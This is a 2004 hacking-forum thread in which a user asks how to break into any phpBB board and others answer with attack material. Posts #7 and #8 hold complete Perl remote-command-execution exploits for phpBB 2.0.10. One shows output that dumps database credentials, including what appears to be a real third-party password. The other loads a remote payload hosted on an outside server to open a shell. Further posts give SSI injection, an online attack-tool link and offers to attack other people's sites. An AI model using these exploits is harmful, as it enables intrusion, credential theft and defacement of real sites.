About
Community
Bad Ideas
Drugs
Ego
Erotica
Fringe
Society
Technology
register | bbs | search | rss | faq | about
meet up | add to del.icio.us | digg it
Go Back   Community > Technology > Network (in)Security
FAQ Members List Calendar Search Today's Posts Mark Forums Read

Network (in)Security Interesting hacks and cracks. Info on firewalls, TCP/IP, encryption, networks, and security. The ins and outs of the phone system, caller services, how things work, what's illegal and what's not, cellular phones, beepers, telephony legislation, the PUC, ISDN, taps, who's listening, and switches. Talking about phones, hacking systems, technical advice, and such is completely LEGAL in the United States -- it's covered by the First Amendment. What's illegal is conspiracy to commit a crime. So if you say something like "Meet me at 2am so we can crack a can" or "I changed my cell phone's number myself" you are criminally liable. Stating "You can crack a can by doing thus-and-so" or "If you wanted to change a cell phone's number, you could do it like so" is perfectly OK. Posting passwords, calling card numbers, or credit card numbers is forbidden on this network. Posting such info will get you booted off the net.

Reply
 
Thread Tools Display Modes
 #1 
Old 2004-12-22, 09:38
marleyandmarley marleyandmarley is offline
Regular
 
Default phpBB Hacking

OK does anyone know any way to hack any version of phpbb?

If so please post.

I just wanna hack one
 #2 
Old 2004-12-22, 09:46
Doc 057 Doc 057 is offline
Regular
 
Default Re: phpBB Hacking

haven't you asked this already?-- you can hack through url-'or- SQL-'or- update.php-'or- unix commands-'or- javainject- 'or another exploit through the website design- some work for some sites some don't and only work for others-- depends on security but php is very easy-- tell me the site in a PM or i can show you how to do it--- 057
 #3 
Old 2004-12-22, 09:59
Doc 057 Doc 057 is offline
Regular
 
Default Re: phpBB Hacking

also java cookie void/rewrite in url or put a cmd.php in url-- you can execute unix, something like-- cmd.php?=uid in the url but i dont do that-- google it-- i here it works well if you can learn to make it work-- i rarely mess with url's cause sometimes it requires alot of guessing or trial and error-- pain in the ass really-- 057
 #4 
Old 2004-12-22, 10:16
Napalm2004 Napalm2004 is offline
Regular
 
Default Re: phpBB Hacking

do you think you can help me with my site? i wanna see how it works, do you have aim? msn?
 #5 
Old 2004-12-22, 11:45
Doc 057 Doc 057 is offline
Regular
 
Default Re: phpBB Hacking

i'm gonna use my disclaimer card here-- what i'm about to say is for entertainment purposes only-- i'll help ya crack that bitch by exploiting her back door and rippin' it wide open-- *taunt**taunt*

this was for informational purposes only--

gimmie a way to contact you-- no i dont use IMs--- 057
 #6 
Old 2004-12-22, 12:21
cvh cvh is offline
Regular
 
Default Re: phpBB Hacking

Go here http://www.defaultalias.com/tools.php?tool=phpbb10

Type in any valid topic number (look into the links of the board something like 230)

and type in a command (try first ls -la then cat config.php to know sql password) you want to execute.

copy the link and enter it in the browser

This only works until php 2.0.10, 2.0.11 is not affected anymore

Have fun.

edit: paste the link into the correct place where the forum is located, something like http://victim/forum/ and not http://victim if the board is located under forum.



[This message has been edited by cvh (edited 12-22-2004).]
 #7 
Old 2004-12-22, 13:20
cvh cvh is offline
Regular
 
Default Re: phpBB Hacking

Here is the exploit if thats more easy

#!/usr/bin/perl

use IO::Socket;

## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@

## @@! @@@ @@! @@@ !@@ @@! @@@

## @!@!!@! @!@ !@! !@@!! @!@!@!@!

## !!: :!! !!: !!! !:! !!: !!!

## : : : :.:: : ::.: : : : :

##

## phpBB <= 2.0.10 remote commands exec exploit

## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0

## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~

## example...

## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819

## The third issue, search highlighting, has been checked by us several times and we can do

## nothing with it at all. Again, that particular group admit likewise. In a future release

## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our

## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to

## be cause for an immediate release.

## heh...

##

## r57phpbb2010.pl www.phpbb.com (http://www.phpbb.com) /phpBB/ 239819 "ls -la"

## *** CMD: [ ls -la ]

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## total 507

## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .

## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..

## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS

## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin

## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache

## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php

## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php

## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php

## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db

## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs

## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc

## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php

## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files

## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php

## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images

## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes

## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php

## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language

## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php

## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php

## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php

## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php

## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php

## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php

## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php

## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php

## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php

## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates

## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php

## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php

## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## r57phpbb2010.pl www.phpbb.com (http://www.phpbb.com) /phpBB/ 239819 "cat config.php"

## *** CMD: [ cat config.php ]

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## $dbms = "mysql";

## $dbhost = "localhost";

## $dbname = "phpbb";

## $dbuser = "phpbb";

## $dbpasswd = "phpBB_R0cKs";

## $table_prefix = "phpbb_";

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## rocksss....

##

## P.S. this code public after phpbb.com was defaced by really stupid man with

## nickname tristam...

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~

## fucking lamaz...

##

## ccteam.ru

## $dbname = "ccteam_phpbb2";

## $dbuser = "ccteam_userphpbb";

## $dbpasswd = "XCbRsoy1";

##

## eat this dude...

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~

if (@ARGV < 4)

{

print q(################################################ ######

phpBB <=2.0.10 remote command execution exploit

by RusH security team // www.rst.void.ru (http://www.rst.void.ru)

################################################## #########

usage:

r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]

params:

[URL] - server url e.g. www.phpbb.com (http://www.phpbb.com)

[DIR] - directory where phpBB installed e.g. /phpBB/ or /

[NUM] - number of existing topic

[CMD] - command for execute e.g. ls or "ls -la"

################################################## #########

);

exit;

}

$serv = $ARGV[0];

$dir = $ARGV[1];

$topic = $ARGV[2];

$cmd = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;

print "*** CMD: [ $cmd ]\r\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;

$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path = $dir;

$path .= 'viewtopic.php?t=';

$path .= $topic;

$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';

$path .= $cmd;

$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';

$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48% 54%54%

50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29 .%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv",

PeerPort => "80") || die "[-]

CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";

print $socket "Host: $serv\n";

print $socket "Accept: */*\n";

print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket> )

{

if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }

if ($on == 1) { print " $answer"; }

if ($answer =~ /^_START_/) { $on = 1; }

}

print "[-] EXPLOIT FAILED\r\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

[This message has been edited by cvh (edited 12-22-2004).]
 #8 
Old 2004-12-22, 13:28
cvh cvh is offline
Regular
 
Default Re: phpBB Hacking

Another exploit for spawning a shell, I don't know if this one has been patched already.

################################################## ###

# phpBB2.pl exploit 2004 http://securityfocus.com/bid/11701

# Spawn bash style Shell with webserver uid

# Greetz foxtwo, Zone-H

# This Script is actually under development

################################################## ###

use strict;

use IO::Socket;

my $host;

my $port;

my $command;

my $url;

my @results;

my $probe;

my @U;

$U[1] = "/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";

$U[2] = "/forum/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";

&intro;

&scan;

&choose;

&command;

&exit;

sub intro {

&help;

&host;

&server;

sleep 3;

};

sub host {

print "\nHost or IP : ";

$host=<STDIN>;

chomp $host;

if ($host eq ""){$host="127.0.0.1"};

print "\nPort (enter to accept 80): ";

$port=<STDIN>;

chomp $port;

if ($port =~/\D/ ){$port="80"};

if ($port eq "" ) {$port = "80"};

};

sub server {

my $X;

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

$probe = "string";

my $output;

my $webserver = "something";

&connect;

for ($X=0; $X<=10; $X++){

$output = $results[$X];

if (defined $output){

if ($output =~/IIS/){ $webserver = "apache" };

};

};

if ($webserver ne "apache"){

my $choice = "y";

chomp $choice;

if ($choice =~/N/i) {&exit};

}else{

print "\n\nOK";

};

};

sub scan {

my $status = "not_vulnerable";

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

print "Testing string ONE and TWO";

my $loop;

my $output;

my $flag;

$command="dir";

for ($loop=1; $loop < @U; $loop++) {

$flag = "0";

$url = $U[$loop];

$probe = "scan";

&connect;

foreach $output (@results){

if ($output =~ /Directory/) {

$flag = "1";

$status = "vulnerable";

};

};

if ($flag eq "0") {

}else{

};

};

if ($status eq "not_vulnerable"){

};

};

sub choose {

print "\nSelect a URL (type 0 to input)";

my $choice=<STDIN>;

chomp $choice;

if ($choice > @U){ &choose };

if ($choice =~/\D/g ){ &choose };

if ($choice == 0){ &other };

$url = $U[$choice];

};

sub other {

my $other = <STDIN>;

chomp $other;

$U[0] = $other;

};

sub command {

while ($command !~/quit/i) {

print "\nHELP QUIT URL SCAN Or Command

\n[$host]\$ ";

$command = <STDIN>;

chomp $command;

if ($command =~/quit/i) { &exit };

if ($command =~/url/i) { &choose };

if ($command =~/scan/i) { &scan };

if ($command =~/help/i) { &help };

$command =~ s/\s/+/g;

$probe = "command";

if ($command !~/quit|url|scan|help/) {&connect};

};

&exit;

};

sub connect {

my $connection = IO::Socket::INET->new (

Proto => "tcp",

PeerAddr => "$host",

PeerPort => "$port",

) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";

$connection -> autoflush(1);

if ($probe =~/command|scan/){

print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";

}elsif ($probe =~/string/) {

print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";

};

while ( <$connection> ) {

@results = <$connection>;

};

close $connection;

if ($probe eq "command"){ &output };

if ($probe eq "string"){ &output };

};

sub output{

print "\nOUTPUT FROM $host. \n\n";

my $display;

if ($probe eq "string") {

my $X;

for ($X=0; $X<=10; $X++) {

$display = $results[$X];

if (defined $display){print "$display";};

sleep 1;

};

}else{

foreach $display (@results){

print "$display";

sleep 1;

};

};

};

sub exit{

print "\n\n\n



SPABAM 2004.";

print "\nspabam.da.ru spabam\@go.to";

print "\n\n\n";

exit;

};

sub help {

print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";

print "\n

PHPBB2.0 - 2.0.10

Command Execution Vulnerability by SPABAM 2004" ;

print "\n

";

print "\n phpBB2";

print "\n

note.. ORP";

print "\n";

print "\n Host: www.victim.com (http://www.victim.com) or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";

print "\n Command: SCAN URL HELP QUIT";

print "\n\n\n\n\n\n\n\n\n\n\n";

};
 #9 
Old 2004-12-22, 13:35
cvh cvh is offline
Regular
 
Default Re: phpBB Hacking

And if somebody want I can post several for sql injection, (remote command execution and a nice shell are off course better and more easy.)
 #10 
Old 2004-12-22, 19:03
Napalm2004 Napalm2004 is offline
Regular
 
Default Re: phpBB Hacking

Id like to se how SQL injections work better, its pretty hard to see were to expand from, after the ' or =1 crap
 #11 
Old 2004-12-22, 19:32
cvh cvh is offline
Regular
 
Default Re: phpBB Hacking

http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf http://www.nextgenss.com/papers/advanced_sql_injection.pdf http://www.securiteam.com/securityreviews/5DP0N1P76E.html http://www.informit.com/articles/article.asp?p=30124&seqNum=3 http://www.linuxexposed.com/internal.php?op=modload&name=News&file=article&sid=562 http://php.planetmirror.com/manual/en/security.database.sql-injection.php http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf

and use google for some more

Here is an exploit for Twiki which shows nicely how to exploit a sql injection bug by using php injection so it will create a php shell were you can sent commands trough to the linux webserver, (very clear code). http://addict3d.org/index.php?page=viewarticle&type=security&ID=2610
 #12 
Old 2004-12-22, 22:30
Doc 057 Doc 057 is offline
Regular
 
Default Re: phpBB Hacking

once you start to learn SQL you can do alot with it but it is tricky @ 1st-- what would take me days to crack would take my friend about 10 minutes.-- it is a very effective method-- sometimes you can put some unix commands in a user login and it will take you to an area displayying default passwords that are active or a .php you can copy and paste in the url to give you access-- this following unix command *sometimes* works even on high security sites-- i can't really post the exact command because you have to modify it for each site- i've already posted it in the other topic you started-- it goes something like

<!--#exec cmd="ls ../"-->

like i said you would have to modify the command for each different site and sometimes unix cmds don't work but you could read up on it or i can point you in the right direction-- i've been surprised at how many times it has worked for me(on legal sites of course)i'm gonna be a jew and not put up the link for the best hacker info but if you contact me i'll tell ya-- 057
 #13 
Old 2004-12-22, 22:48
FLIP SIDE ORANGE FLIP SIDE ORANGE is offline
Regular
 
Default Re: phpBB Hacking

LOLZORZ U IZ T3H GH3Y
 #14 
Old 2004-12-23, 00:25
protonigger protonigger is offline
Regular
 
Default Re: phpBB Hacking

You will also want to look into XSS attacks. That's what most components in phpBB, as well as most other types of forum software, are vulnerable to...
 
To the best of our knowledge, the text on this page may be freely reproduced and distributed.
 

totse.com certificate signatures
 
 
About | Community | Bad Ideas | Drugs | Ego | Erotica | Fringe | Society | Technology
Hot Topics